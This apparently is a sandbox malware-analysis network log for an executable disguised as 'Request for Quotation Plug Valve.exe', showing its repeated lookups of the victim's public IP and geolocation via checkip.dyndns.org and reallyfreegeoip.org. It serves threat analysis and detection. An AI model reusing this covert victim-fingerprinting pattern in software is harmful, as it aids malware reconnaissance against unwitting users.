                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                    Oct 8, 2024 15:10:21.593852997 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 8, 2024 15:10:21.697854996 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 5a44b549a8d206d1230257526ab5cea2
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.649765193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:22.349164963 CEST127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Oct 8, 2024 15:10:22.813498020 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:22 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 3ca2be1293cb6e4084b4734b458ec05b
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.649774193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:23.446795940 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:24.944582939 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 439431ad3f8c12a8a9e80144bfd6f6a1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.649789193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:26.681273937 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:27.142234087 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 726cf8b577c57e515722ccb3e9f9d908
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.649801193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:27.791939020 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:28.267467022 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: e530f9288053b6068e9d3af9050829a8
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.649808193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:28.937613964 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:29.397955894 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 2d475e75cbe7598206e5498ef82b7761
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.649816193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:30.009635925 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:30.488385916 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 0673f31efbb95bf6c9e47bcede18dbeb
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.649828193.122.130.0806456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 8, 2024 15:10:31.097845078 CEST151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Oct 8, 2024 15:10:31.552058935 CEST320INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 103
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 63f81b34dbf79fd72ebb87be419b7710
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.649752188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:21 UTC670INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:21 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59353
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNsxYhDgZzb7tsnfERSDfBFnsgim9gZ8jr3iqmd7UDl62TZgTYmE2AATFi8bxxJyHsHPuPcN9lkBCUfB64Ns68ZjWopdkrKwNefKpyfxj1Z1Z4r7c1H6Vj4EodF0VLakmf6RxDbL"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65ee04a8a72ad-EWR
                                                                                    2024-10-08 13:10:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.649761188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:22 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-08 13:10:22 UTC706INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:22 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59354
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUw9xVZ%2By2zNkhvFibmZmGWGxJeXamhDjRcHMkbh6d0xUNtzodPYluIiw1AsZPveAgiqVQNUtlNGgrZor0vQQ6udVIdWGLvlKzLaRerKiRLocFjhvD5%2FEEDCptrtg%2FWDdiuaC1WR"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65ee529fcc45c-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-08 13:10:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.649769188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-08 13:10:23 UTC684INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:23 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59355
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgkaMKddmiWFLPPnUl85PpP9UfTxJFgQj%2FvAiBxQVs%2BdS%2Bf5AxCSG%2FEoWALWE54z6zqHkJnT0VM7O36Vgeh6%2FFrpyf7h%2FcR%2FF30nDvp830ZPKre76ne4yGM0HXuwAYuImZjFRRIN"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65eec18e643df-EWR
                                                                                    2024-10-08 13:10:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.649784188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:25 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:25 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59357
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VrFue2BfRazTNv5%2Bfzhd1rply0MVobGGA5T6RXGeIkdKne44wAtiJUKptLPJZe2m2zV6oae7YujhuQB4ej0KgYIEn6VJQ7vfUXPFa1WOGly0nNR0EYvckV6T1HBt%2BhF1IjGorDqL"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65ef97d5e41e3-EWR
                                                                                    2024-10-08 13:10:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.649795188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:27 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:27 UTC676INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:27 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59359
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4g52iLa53DHdalyiVmKF4ZJCXmeR6a4KW7nq7H%2FCrnNoy5wZHeubWh8HnjodGOP%2BhefMTLeQZ1ydRMvk6lfLAW7uuEiGQqyQErSXLxQtXZNc2pYoGgZP4JpImdV5gSBe%2FQJRgoEa"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65f072db441a6-EWR
                                                                                    2024-10-08 13:10:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.649803188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:28 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:28 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59360
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNGt1JyywOMAxqOpFlQTYh4R5RTBRl5S9VVU7aciujlsS7rl6lsi3z75dnamRfkeEW%2Fdiheh51RtFESjPpxDRwiMEAulg8g3ZwMpyKPUjPzCY7tkS%2F2DO0PQmow0DpZni5pEUzo5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65f0e1b4842a0-EWR
